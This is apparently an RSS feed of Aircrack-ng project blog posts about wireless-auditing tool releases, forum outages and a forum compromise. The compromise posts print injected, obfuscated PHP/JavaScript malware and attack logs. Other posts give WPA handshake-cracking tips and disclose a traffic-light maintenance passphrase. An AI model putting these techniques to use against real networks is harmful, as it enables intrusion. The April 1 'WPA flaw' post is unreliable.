<item><title>Aircrack-ng 1.2 Beta 2 release</title><description>Secuobs.com : 2013-12-01 06:49:26 - Aircrack ng - Here is a second beta. Enjoy it. Release Notes: * Airbase-ng IE order fixed * Improved WEP cracking speed using PTW * Fixed WPA capture decryption when WMM is used * Fixed memory leaks in several parts of the suite * Fixed compilation with recent version of gcc, on cygwin and on Gentoo hardened * Now using Coverity Scan for static code analysis * Lots of other small fixes. Detailed changelog: * Airbase-ng: Fixed order of IE when creating soft Access Point * Airbase-ng: Fixed Caffe Latte Attack not working for all clients * Aircrack-ng: Improved PTW speed thanks to Ramiro Polla * Airmon-zc: Fixed improper use of the interface * Airdecap-ng: Fixed decoding captures with WMM enabled * Various: Fixed memory leaks in Aircrack-ng, Aireplay-ng, OSdep * Added support for static analysis using Coverity Scan * Fixed compilation due to PIC unfriendly assembly on Gentoo hardened * Fixed running tests using 'make check' * Fixed building aircrack-ng with recent version of gcc and also on cygwin * Various other small fixes</description><link>http://www.secuobs.com/revue/news/483703.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/483703.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Beta 1 Release</title><description>Secuobs.com : 2013-05-26 06:35:21 - Aircrack ng - After a few years, we finally got a release: 1.2 Beta 1. Enjoy. Release summary: * Compilation fixes on all supported OSes * Makefile improvement and fixes * A lot of fixes and improvements on all tools and documentation * Fixed licensing issues * Added a few new tools and scripts (including distributed cracking tool) * Fixed endianness and QoS issues. You can find more details in the ChangeLog and even more in our subversion history. And, 2 more things: * The forum will be ready in a few days * We are now using Travis CI for continuous integration</description><link>http://www.secuobs.com/revue/news/447772.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/447772.shtml</guid></item>
<item><title>Trac migration and forum crash details</title><description>Secuobs.com : 2013-05-21 06:42:57 - Aircrack ng - Trac/SVN: You probably didn't notice but I had been working a lot on the servers and I recently migrated our old trac server to a new server. However, a migration never goes without a glitch (who unleashed Murphy?). A few settings changes need to be done for Trac and we're done but SVN was behaving. The only solution I saw is moving it temporarily to a separate server. URL: http://svn.aircrack-ng.org. You can also reach it via https but it's a self-signed certificate for now. Since the repository UUID didn't change, you can simply relocate your local copy or check out with the new svn URL. Trac URL didn't change and it is now also available via HTTPS with a proper certificate. Forum: It had a big issue a few weeks ago. My provider told me their log says the instance was stopped. However, their cloud system crashed the instance. The non-persistent disk where the OS of the instance is installed goes back to its original state (so any data/customization on that disk is lost) when the VM is stopped or archived. I already had similar issues before but I was able to force the instance to reboot so it wasn't a big deal. Forum data is hosted on a MySQL database and those files were on the non-persistent disk. Good news: Forum files and Apache config were stored on the persistent disk and I had a backup script for the DB. Bad news: last time the backup script ran was in July 2012. Lesson learned: check every so often that the backup scripts are still running. We lost about 10 months of posts and I am deeply sorry for what happened. I had a discussion with my provider and I'm now downsizing due to that issue, past issues and their customer support. I'll only keep stuff that never gave me any issue: domains. Trac was the first service to be migrated to the new server a very good friend gave me (I can't thank him enough for that). Other services will be moved on that server too.
</description><link>http://www.secuobs.com/revue/news/446684.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/446684.shtml</guid></item>
<item><title>Wirelessly controlled traffic light</title><description>Secuobs.com : 2013-04-02 03:42:07 - Aircrack ng - Hello guys, Some time ago, a person who shall not be named emailed me and talked about new traffic lights that can be controlled wirelessly. Since access points are getting pretty powerful these days, it makes sense that they are now embedded in traffic lights to control them. The reason behind making it wirelessly accessible is to make maintenance easier for technicians so that they don't have to open the whole thing. They just have to connect to the AP inside the traffic light to do it. Here is the maintenance page. The URL of that page is blurred for security reasons: [IMAGE] Since there is no reference to it on other pages and it's so basic, I guess they forgot to remove it on production units (or maybe it is just meant to be used by technicians/developers or it is security by obscurity). On other pages you can input parameters of the traffic lights when it is in automatic mode such as operating times (it will blink yellow when outside of it), how long each light lasts, etc. He even sent me one of those traffic lights. As a side note, you would be amazed by the size of those things: [IMAGE] Here is a close-up where the AP is: [IMAGE] The network cable you can see is used to interconnect different traffic lights at crossroads to synchronize several of them. Well, of course, since they don't want people to just hack in and mess with the traffic lights, they did not make it easy to connect (SSID is random) and to find that page. However, the person who contacted me managed to grab the handshake while the maintenance guy was doing maintenance and apparently, they use the same easy passphrase (Maintenance123) on ALL those new traffic lights. By decrypting the traffic, he figured out the page where you can control the traffic light manually. We both tried to contact the company to let them know about the flaws since it's pretty unsafe/dangerous to be able to
change the light on live traffic lights and especially since they use the same passphrase on all of them. But they never got back to us.</description><link>http://www.secuobs.com/revue/news/437045.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/437045.shtml</guid></item>
<item><title>Will my card work with Aircrack-ng?</title><description>Secuobs.com : 2012-10-19 02:52:51 - Aircrack ng - Even though there is plenty of documentation on the subject (and most of the time, existing posts about it in the forum), I still see a lot of these questions, especially for new cards. It's pretty easy to find out and the easiest way is just to try it with a recent version of a pentesting live CD like Backtrack or Pentoo. If your card is detected, you're good to go. You can even use Ubuntu or whatever distro you're comfortable with. An important thing to note is that what airmon-ng says about your chipset is pure information and doesn't affect your card's ability to inject/monitor (if the driver/card has that capability in the first place, obviously). A few important notes here related to VMware/VirtualBox: * If your card is internal, it's not gonna work, you must reboot and run the live CD * If your card is USB and you are running VMware/VirtualBox, then make sure it is attached to the virtual machine. It is explained in the wiki for VMware and it is pretty similar for VirtualBox. If it doesn't work, the quickest way to find out if it will work is to compile compat-wireless, install it and reboot. If your card doesn't show up then it might need a firmware. Download it and put it at the right location. Most of the time, a package containing it is available for your distribution (search for 'firmware' with your package manager, synaptic/apt-cache/aptitude on Debian-based distros) and install it. If you download it manually, check dmesg to make sure it doesn't show an error; the message is self-explanatory when it happens. If your card still doesn't show up (assuming there are no unresolved symbols), then it's probably not gonna work. In that case, you might want to practice your Google-fu to see if there is a driver in the works.</description><link>http://www.secuobs.com/revue/news/406556.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/406556.shtml</guid></item>
<item><title>Forum and trac/svn up</title><description>Secuobs.com : 2012-07-06 15:26:25 - Aircrack ng - Hi, June has been a very busy month for me, I didn't really have time to work on the forum and I apologize for that. I've been working for the past week on bringing back up all those services. Trac and svn were safe to use and brought back up a few days ago and I spent a few more days to clean up the forum and migrate it to a new server. Nothing was lost and your login/passwords are still the same. Since it is on a new machine, on its own, it should be faster than before and I can tell you that it is also better protected (I listened to your advice). In this case, it also means a new IP and thus it might in some cases take a day or two for DNS to spread. How do you know you reached the new one? Two ways: * Open it in a browser: the old forum will return a 403 Forbidden, so if you don't have that, you're good * Do a nslookup forum.aircrack-ng.org. It should return 17832208188. Please send me feedback about the forum in the comments, especially if you have issues with it (I'll try to address them). Enjoy.</description><link>http://www.secuobs.com/revue/news/385797.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/385797.shtml</guid></item>
<item><title>More about the forum virus</title><description>Secuobs.com : 2012-06-05 03:19:47 - Aircrack ng - I got more time to investigate it. I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file) so I ran an MD5. And it turned out the PHP files were changed. At the beginning of the index.php, you could see the following code added (in between php tags): eval(base64_decode('...')); When it is decoded, the beginning is clear but it has once more an eval and base64_decode: error_reporting(0); $bot = FALSE; $ua = $_SERVER['HTTP_USER_AGENT']; $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome'); foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}} if (!$bot){ echo(base64_decode('...')); } And that second part decoded unfortunately is obfuscated (it is Javascript and enclosed between script tags): i=0;try{avasv=prototype;}catch(z){h="harCode";f=['...'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&amp;&amp;e&amp;&amp;r&amp;&amp;z&amp;&amp;h&amp;&amp;s&amp;&amp;f&amp;&amp;v)e(s); It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does. On a side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought. I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server.</description><link>http://www.secuobs.com/revue/news/379482.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/379482.shtml</guid></item>
<item><title>Forum virus details</title><description>Secuobs.com : 2012-05-30 04:37:08 - Aircrack ng - Hi, as you know, I shut down the server a few days ago because I was told there was a virus Here is what I know about it so far This post will be updated as I know more There is a summary at the end of this post which will be useful for your IT department The virus is also known by Sophos as Mal Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data' It's a piece of PHP called rbvzvphp  1418 bytes  that has a payload encoded in base64 Then it is passed to the JavaScript function eval  which is going to execute it If any of you guys is interested in the piece of code, let me know, I can send you a copy  I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it I can read Javascript but the problem is that it's not plain Base64 I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges  user without bash, etc  For those who are interested, here is the raw apache log from the attack  91224160132 - -  23 May 2012 01 12 04  0200   POST  data rbvzvphp HTTP 11  200 15  http forumaircrack-ngorg phpmyadmin indexphp   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  Media Center PC 60  InfoPath2  MS-RTC LM 8  190102136196 - -  23 May 2012 20 22 43  0200   POST  data rbvzvphp HTTP 10  200 727  -   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  NET CLR 2050727  NET CLR 3530729  NET CLR 3030729  Media Center PC 60  MAAR  NET40C  NET40E  AskTbPTV2 59114019  813022242 - -  23 May 2012 20 23 26  0200   POST  data rbvzvphp HTTP 11  200 1212  -   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  NET CLR 2050727  NET CLR 3530729  NET CLR 3030729  Media Center PC 60  MAAR  NET40C  NET40E  AskTbPTV2 59114019  116551996 - -  23 May 2012 20 24 50  0200   POST  data rbvzvphp HTTP 11  
200 1212  -   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  NET CLR 2050727  NET CLR 3530729  NET CLR 3030729  Media Center PC 60  MAAR  NET40C  NET40E  AskTbPTV2 59114019  61501712 - -  23 May 2012 20 28 15  0200   POST  data rbvzvphp HTTP 11  200 1270  -   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  NET CLR 2050727  NET CLR 3530729  NET CLR 3030729  Media Center PC 60  MAAR  NET40C  NET40E  AskTbPTV2 59114019  1782182242 - -  23 May 2012 20 27 01  0200   POST  data rbvzvphp HTTP 11  200 1270  -   Mozilla 40  compatible  MSIE 80  Windows NT 61  WOW64  Trident 40  SLCC2  NET CLR 2050727  NET CLR 3530729  NET CLR 3030729  Media Center PC 60  MAAR  NET40C  NET40E  AskTbPTV2 59114019  200222109146 - -  24 May 2012 07 48 55  0200   POST  data rbvzvphp HTTP 11  200 19  -   Mozilla 50  Windows NT 61  Win64  x64  rv 50  Gecko 20110619 Firefox 50  200223136254 - -  24 May 2012 11 50 31  0200   POST  data rbvzvphp HTTP 11  200 19  -   Mozilla 50  compatible  MSIE 80  Windows NT 51  Trident 40  SLCC1  NET CLR 3045062152  NET CLR 3530729  NET CLR 114322  210101131232 - -  24 May 2012 15 49 50  0200   POST  data rbvzvphp asc eval base64_decode pourcents27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP 11  200 19  -   Chrome 1508600  Windows  U  Windows NT 60  en-US  AppleWebKit 5332025  KHTML, like Gecko  Version 1508600  As you can see, the file was created by that first guy, 91224160132 and the timestamp  creation and last modification  of the file confirms it  -rw-r--r-- 1 USER GROUP 1418 2012-05-23 01 12 rbvzvphp Unfortunately, I don't think I can do against those guys, a whois on that IP address looks like it's a shady business  Bergdorf Group Ltd  IP in the Netherlands but the person to contact lives in the Virgin Islands Anyway, I sent them an email address and we'll see if they answer As far as I know, it is limited to the forum and nothing else The 
attacker didn't get on the server or install any backdoor. So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum, and check the apache logs to see if there is any other mention of those IP addresses. I want to know how it happened exactly and when. The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated. So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11:12pm) and I stopped it on May 24, around 14h00 (2pm). I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it. </description><link>http://www.secuobs.com/revue/news/378421.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/378421.shtml</guid></item>
<item><title>How to contribute </title><description>Secuobs.com : 2012-05-11 03:00:32 - Aircrack ng - I got an email asking how to contribute to Aircrack-ng. He was telling me that he did not find any information about it. He was right, there was nothing written yet; it's kinda implicit but let's address that. So, first of all, make sure to work on the latest subversion revision and make your modifications in it. Don't remove the subversion control directory (.svn) and files. About the code, it MUST be GPL or GPLv2 and allow OpenSSL exception (see the license exception in every single source code file). You can add comment to your diff file at the top, before the line beginning with   It is displayed by trac (and you can easily read them) but the advantage is that it is ignored by patch when applying the patch. Make it clear in that section that your patch is GPL or GPLv2 and allow OpenSSL exception. Another thing about the code: make sure that your code is easy to read and well commented. I'm talking about smart comments and documenting code that is not obvious. I found a post about it and he uses Javascript but it applies to every other language. Ah yeah, don't address several issues with a single patch. One patch, one issue. Once you're done, you have to create a difference (or a patch, that's the same thing). Thanks to subversion, it is very easy to do: just issue 'svn diff &gt; PATCH_FILE.diff' and you're done. Important note: If your changes added files, make sure to do a 'svn add' for each of them. If you don't do it, the added files won't be included in the patch. Once you're done all that, you can create a new ticket on our trac, fill all the fields (if you are not sure how to fill some of them, don't worry, I'll do it) and attach the patch. If you have any issue doing so, feel free to shoot me an email with all the details, I'll post it. If you have several patches and they need to be applied in a specific order (affecting the same file), add a number in front of the name of the 
patch so that I know how to apply them or explain the order of the patches in the ticket. That's it. If you have other questions, post them in the comments, and I'll update this post to address them. </description><link>http://www.secuobs.com/revue/news/374963.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/374963.shtml</guid></item>
<item><title>WPA Flaw let us crack the PMK in a few minutes</title><description>Secuobs.com : 2012-04-01 21:45:57 - Aircrack ng - Today we are very proud to announce that we found a flaw that lets us crack WPA in just a few minutes no matter what the passphrase length is. Obviously, we don't get the passphrase but the PMK (which is 'derived' from the ESSID and the passphrase), the master key, which is more than enough to decrypt a capture file (Airdecap-ng allows to decrypt a pcap file with either the passphrase or the PMK, using -k). I'm sorry, I wish I had more time to write a longer post to give more technical details but right now I'm very busy writing the paper. It will be published here probably tomorrow. And in case you wonder, it will be integrated into Aircrack-ng. </description><link>http://www.secuobs.com/revue/news/367466.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/367466.shtml</guid></item>
<item><title>Compat-wireless</title><description>Secuobs.com : 2012-03-09 01:13:07 - Aircrack ng - We have at least 2 or 3 times a day on IRC the questions about compiling drivers (and more in the forum) and we always say that you have to patch them like explained in the wiki. As said thousands of times (I just want to avoid having to say it again in the future), you should ALWAYS take the latest compat-wireless version NO MATTER what your kernel version is. Compat-wireless version is related to the kernel version in a way that it has the features a kernel version has. So, there is no point in taking the same version as your kernel because all you will do is having the features (and not fix anything) that you already had in your kernel (minus the patches from your distro if any were applied). Compat-wireless with dates (instead of version) is the most up to date and it comes from git. So if you are not a developer (who wants to debug/work with them), then you should not use these. You can get much more details (and downloads) on Linux Wireless website. To summarize (or if you don't want to read anything else in this post): ALWAYS take the latest version of compat-wireless (don't take the one with dates). </description><link>http://www.secuobs.com/revue/news/362376.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/362376.shtml</guid></item>
<item><title>WPA cracking tips and tricks</title><description>Secuobs.com : 2012-02-20 02:10:35 - Aircrack ng - WPA cracking is at the same time easy and hard to crack. It is quite easy because all you need is getting the handshake (with WEP, you need a lot of data frames). It is hard because getting the handshake can be tricky and also because cracking can take a lot of time (due to passphrase length, 8 to 63 characters). Important notes: - Never forget to read the documentation in the wiki. - Don't hack AP you don't own or if you don't have the permission to do it. There are several things to consider when getting the handshake: - You need to be somehow close to both the AP and the client. If you only have the client, you should use airbase-ng to get the client to connect to you. - If RXQ is below 70 then there is a good chance you'll get a partial handshake which will be unusable. - You MUST be on the same channel as the AP (in airodump-ng, you will see RXQ column when on a fixed channel). - It is not necessary to keep deauthenticating the client, once or twice should be more than enough. And let the client reconnect in order to get the handshake. Each time aireplay-ng tells you it sent deauthentication, it sent 128 or 256 deauth frames. If you still don't get the handshake after reading the wiki and those tips, then you might want to have a look at WPA Packet Capture Explained tutorial in the wiki to help understand what's going on. Tip: It is always a good idea to clean up the capture to include one beacon and the handshake before cracking it or submitting it to an online cracking service. The reason is that YOU select the handshake to crack and don't let the tool on those services select the handshake (that might be the wrong one). It might sound funny but it is true, there is 0% chance to crack it if the passphrase is not in the dictionary (and 100% when it is in the dictionary). So what you want to do is profiling your victim when cracking the handshake to 
include words/phrases related to it. You can also find a few tools on backtrack such as John The Ripper that will help you mangle the dictionary and 'add' new words. If you need to generate phrases such as number, check out 'crunch'. Note that aircrack-ng doesn't mangle the wordlist and doesn't do any permutation, it just tries each passphrase against the handshake. And in case you want to be able to 'pause' the cracking, use John The Ripper to output to stdout and pipe the results to aircrack-ng (using -w -). GPU cracking makes cracking much faster. One of the best solutions for that is oclHashcat-plus (and it is much faster than pyrit). Now that you've cracked the handshake, you might want to verify it. People have been trying to connect to the AP but it is the wrong way of checking since there are a lot of variables involved (such as distance, mac filtering, bad drivers, etc.) that will prevent you from connecting even if the passphrase is valid. So what you have to do is using airdecap-ng. With WPA, since what you get with the handshake is a session key for a specific device, you can only decrypt the traffic after the handshake for that device. Don't be fooled by airdecap-ng giving 0 frames decrypted when there are a few data frames encrypted with WPA, there might not be any traffic from that device after the handshake. Hence why it is very important to be able to understand a capture file. </description><link>http://www.secuobs.com/revue/news/358726.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/358726.shtml</guid></item>
<item><title>Aircrack-ng on phones (Android, iPhone and others)</title><description>Secuobs.com : 2012-02-12 02:57:54 - Aircrack ng - I've often seen questions like "How can I get Aircrack-ng on my iPhone/Android/Symbian/ADD YOUR OS?" Let me clarify the status for phones. In order to have Aircrack-ng running on the phone, there are several requirements: 1. Being able to cross compile (because the CPU on your phone has a different architecture than the one on your computer). So if you cannot find a cross compiler for that specific platform, forget it. 2. A wireless card. Most phones have one these days, so that's easy. 3. If your phone is Linux based, you will also need to be able to be 'root' to run the commands. 4. The driver must allow monitor mode. That's usually where almost all phones fail because only a few have that. Sometimes the card doesn't have a stable monitor mode. The reason behind it is that it must be low power (and cheap to manufacture) so the chipset (and its firmware) is very limited. To give you a quick answer, only one phone meets all the requirements with its internal card: the Nokia N900 (it needs the 'power' kernel available in the extra-devel repositories). While doing monitor mode/injection, the battery lasts about 4h. - iOS devices: Forget it because it is never going to happen, Apple is consumer oriented and doesn't really care about the computer security industry. Plus, iOS is too closed source and AFAIK the chipset is not capable of proper monitor mode. You could argue that it is available via Cydia. It's true but you don't have any monitor mode capabilities, so it isn't worth it (also don't bother sending me Cydia bug reports, I don't read them). - Android: Forget it with the internal card. However, it will be possible with an external USB card. Dragorn, the author of Kismet Wireless, is working on it. - Other OS: Forget it (for the same reasons as Apple). </description><link>http://www.secuobs.com/revue/news/357325.shtml</link><guid 
isPermaLink="false">http://www.secuobs.com/revue/news/357325.shtml</guid></item>
<item><title>Best card (or best laptop/netbook) for Aircrack-ng</title><description>Secuobs.com : 2012-01-28 22:12:12 - Aircrack ng - After a long time and no updates on the blog, I'm back. I hope to keep it active like before. One of the questions I see asked very often is "what card should I use for Aircrack-ng?" or "what laptop should I use?" As far as card goes, I can tell you that even though the wiki looks outdated (it isn't updated because the information is still accurate), the Alfa AWUS036H (Realtek 8187) is still a very good card. Another very good one is the Rockland N3 (Ralink chipset). If you would like to capture and inject on 802.11n networks, you can use a card compatible with carl9170 (I use a Netgear WNDA3100 v1). Correct me if I'm wrong but I haven't been successful with new Ralink cards even though they support 802.11n, something is missing in the driver to be able to have that capability in monitor mode. There might be other compatible chipsets for 802.11n (maybe recent Intel cards) but I haven't tested them so I can't confirm. So, now about laptops and netbooks. One of the best chipsets for internal cards is still Atheros. You can try getting a laptop with Atheros cards but it is not easy to find since vendors don't often advertise what card they use and in most cases it is because they use a Broadcom (which are far from being the best cards). When they do, it is usually an Intel. So what I recommend about laptops and netbooks: Get one that you like and you're comfortable with, don't worry about the wireless card that comes with it and use one of the cards mentioned above. If you really want an internal card, you can replace the internal card with an Ubiquiti but keep in mind that some laptops have a BIOS lock that prevents using another card than the (overpriced) one they sell. HP/Compaq is known to do it. I've heard Dell does it on some laptops too. I don't know for others. Another thing I've often seen is people who want to get cards from local stores. In my 
experience, local stores 1) don't have a lot of choices, 2) don't know what chipset their cards have and 3) don't really care about it. That's why I always shop online for wireless cards. There is a good chance you can find a compatible card on Amazon or eBay. I'll cover phones and Access points in another post. </description><link>http://www.secuobs.com/revue/news/354639.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/354639.shtml</guid></item>
<item><title>Monthly news - September 2010</title><description>Secuobs.com : 2010-09-25 00:57:38 - Aircrack ng - Aircrack-ng now has support to export WPA handshake information to Elcomsoft Wireless Security Auditor v3 project file since svn r1781 with '-E', thanks to beini's author. As said in previous monthly news, migration mode attack (WPA Migration Mode: WEP is back to haunt you) has been added to aireplay-ng and a few improvements were added to aircrack-ng. More details in r1769 commit. Forum: - Adding accurate chipset detection to airmon-ng. More details can be found here. - Who has the longest airodump-ng session? - Poor man's Aircrack-ng distributor - A tool to distribute aircrack-ng, developed in Python. - minidwep-gtk, a gui of aircrack-ng in shell script, has been updated for BT4 final and BT4R1. Other: - A few tools for generating passphrases lists. - Live CD: - WEAKERTHAN2, another penetration testing linux live cd, was released a few weeks ago. - Beini, a small Live CD based on TinyCore Linux, is one year old (chinese). - Scripts: - Wi-fEye 051 was released. Its author created 2 videos: video 1 and video 2. - Wifite, another GUI written in Python for Aircrack-ng. </description><link>http://www.secuobs.com/revue/news/251566.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/251566.shtml</guid></item>
<item><title>Monthly news - August 2010</title><description>Secuobs.com : 2010-09-17 02:14:45 - Aircrack ng - NeoPwn changed their plan and prefer to release it when the final version is ready. It will finally be called NeoPwn v2. They plan to do two betas: - Private beta containing the control panel, the injection driver and installer but the number of requests is limited. - Public beta without the control panel, injection driver and installer once the project has reached beta stage. The final version will be free to download when it is completed and a safe installation process has been developed. Their website contains more details about the release plan. I tested the driver and so far it is working really well as you can see: IMAGE. Last month, the video was showing the injection test on the N900. If you watch carefully, you can note that one of the BSSID is 00:00:00:00:00:00. I first thought it was a bug in aircrack-ng but it's not. I was told it's an unconfigured AP. It only sends beacons and jumps on different channels. If you're as curious as me, here is a capture file with just a beacon. Forum: - WiFiCake-NG 17 is a Perl/TK interface for manipulating the CSV of airodump-ng. You can find more details in the forum thread here. Their website contains a youtube video as well as a PDF manual for the application. Other: - Hack4Fun made an interview with Christophe Devine. - BlackHat and Defcon presentation slides of Hole 196 (WPA Too). - Blackhat presentation "WPA Migration Mode: WEP is back to haunt you". Contains paper, presentation slides, videos and patches for Aircrack-ng and Kismet. It is an attack against Cisco WPA Migration mode that allows WEP and WPA clients to associate to an AP with the same ESSID. It will be integrated to Aircrack-ng. </description><link>http://www.secuobs.com/revue/news/248112.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248112.shtml</guid></item>
<item><title>Monthly news (July 2010)</title><description>Secuobs.com : 2010-07-14 01:42:40 - Aircrack ng - This month I have some really interesting news. A lot of people would like to have Aircrack-ng on their phone (including me) but unfortunately most phones can't work due to their driver. Do you remember when I talked about NeoPwn v2, which is BackTrack Mobile? A beta will be released before BlackHat/Defcon and will include Aircrack-ng. What's really great is that injection works with the internal card of the N900 (the original video can be downloaded here). They also released 2 additional videos on Youtube: - BackTrack Mobile (Nokia N900) - Packet Injection Aireplay-NG. - BackTrack Mobile (Nokia N900) - Mac Address Changer. Forum: - There's a new section in the forum for BackTrack Mobile. - Beini 121 was released. It can be downloaded from its website. - Jano updated wesside-ng replacement, one-command WEP crack, to save the key into a file. - criser released WepCrackGui 081, a GUI for Aircrack-ng in C# (Mono). It can be downloaded on Sourceforge. Other: - BlackHat conferences will happen the 28th and 29th. Schedule can be found here. - Besides BlackHat, there will also be BSides Las Vegas. There aren't as many talks as in BlackHat but they look really interesting. - Defcon 18 (29 July - 1 August) posted the final schedule a week ago. - Starting from 2011, the Wifi Alliance will not allow WEP and TKIP in certified Wifi devices. You can read more about it on WiFiNetNews. - I missed the update (v217) of the patch for FreeRadius-WPE (Wireless Pwnage Edition) released in May. </description><link>http://www.secuobs.com/revue/news/240265.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/240265.shtml</guid></item>
<item><title>Monthly news (June 2010)</title><description>Secuobs.com : 2010-06-07 23:59:45 - Aircrack ng - Here is the 5th edition of our monthly news. Project: - We had some downtime on the server hosting trac and forum between the 16th and the 20th (hardware issues) and fortunately nothing was lost. You can read more in these 2 posts: Trac and forum down, and Trac and forum up again. - The forum will be moved to the new server in a bit more than 2 weeks. The change will be transparent for you. And that means only trac and buildbot are left on the old server. They should be done before Defcon. Forum: - Airoscript not dead. It got some updates and is now renamed to Airoscript-ng. To get it, type svn co http://trac.aircrack-ng.org/svn/branch/airoscript-ng in a console. - Beini 121 was released a few days ago. It can be downloaded from its website. - minidwep-gtk, a GUI of aircrack-ng in shell script, has been updated to work with Aircrack-ng 1.1. - criser, the author of WepCrackGui, is developing a QT frontend for WepCrackGUI that should be included in the next release, v09. You can find instructions to get the sources and test it in this post. He also posted some screenshots. You can follow him on twitter: wepcrackgui. Other: - I'll give a talk at Sharkfest about wireless security next week. - digininja released a Karma patch for hostapd. It now works with ath5k and ath9k. It should work with prism54 and various other cards but that's untested. - Backtrack 4 r1 was released. Changes: new kernel (2.6.34-rc6), packages updates, and new drivers. Note that it is an unofficial build meant for assessing hardware incompatibilities with the new kernel. - The WiFi Alliances and WiGig announced alliance on multi-Gigabit wireless networks in the 60GHz band. It will allow up to 7 Gigabit/s. You can read more here. The official press release can be found on WiGig website. - Here is another GUI in Java for Aircrack-ng: GRIM WEPA. </description><link>http://www.secuobs.com/revue/news/229311.shtml</link><guid 
isPermaLink="false">http://www.secuobs.com/revue/news/229311.shtml</guid></item>
<item><title>Trac and forum up again</title><description>Secuobs.com : 2010-05-20 23:26:25 - Aircrack ng - You probably noticed earlier today that the trac and forum were working again. They finally fixed the issue (which was according to them probably a bad RAM module or the CPU fan) by replacing completely the server (but keeping the hard drive). I would tend to think that it's the CPU fan that failed. But whatever, it works again and that was what we all wanted. </description><link>http://www.secuobs.com/revue/news/224172.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/224172.shtml</guid></item>
<item><title>Monthly news (May 2010)</title><description>Secuobs.com : 2010-05-04 23:55:15 - Aircrack ng - Project: - Aircrack-ng 1.1 was released a bit more than a week ago. A lot of bug fixes (including the buffer overflow in different tools) and improvements have been done. The most noticeable changes are the addition of airdrop-ng by TheX1le and the interaction in airodump-ng. The following screenshot shows some of the possibilities of the interaction (more details in the wiki and in the manpage). In this case, when you color an AP, its clients are automatically colored the same. Forum: - criser released v08 of his C# (Mono) GUI, wepcrack. He uses git for his source control and if you want to use the latest source and don't know much git, read the following. He is looking for someone who can design an icon for his software. - Zermolo released permutator beta 13. It generates incremental wordlists/dictionaries based on your needs. The package by Jano contains the source code and an Ubuntu package. Other: - ShamanVirtuel released a GUI to capture WPA handshakes called Autohs-GUI. His project is hosted on Google Code along with a few other programs. </description><link>http://www.secuobs.com/revue/news/218797.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/218797.shtml</guid></item>
<item><title>Aircrack-ng 1.1</title><description>Secuobs.com : 2010-04-25 03:26:32 - Aircrack ng - Aircrack-ng 1.1 is released. A lot of bug fixes (including the buffer overflow in different tools) and improvements have been done. The most noticeable changes are the addition of airdrop-ng by TheX1le and the interaction in airodump-ng. Here is the changelog: - airdrop-ng: New tool by TheX1le - airodump-ng, aircrack-ng, airdecap-ng, airbase-ng: Fixed buffer overflow in airodump-ng due to forged eapol frame - aircrack-ng: Fixed multicast detection (WPA handshake detection) - airodump-ng: Added interaction (see wiki for the commands) - airodump-ng: Fixed client time in netxml file - airtun-ng: Add WDS and bridge support - airbase-ng: automatically set privacy bit to 1 if WPA or WPA2 is used (-Z or -z option) - airmon-ng: Updated iw URL for v0919 - airdriver-ng: Fixed link for madwifi-ng - aireplay-ng: Chopchop enhancement to not stop but wait on deauth packets - tkiptun-ng: Fixed segfault - wesside-ng: Fixed compilation bug with recent version of gcc - cygwin: Compiling sqlite isn't necessary anymore, libsqlite3-devel package can be used - osdep: Strict aliasing and x86_64 fix - osdep: Add tap support for Darwin/OS X. Still require tuntaposx from sourceforge to work - All: Fixed compilation on cygwin 1.7 - All: Fixed compilation on recent version of OSX - manpages: Fixed 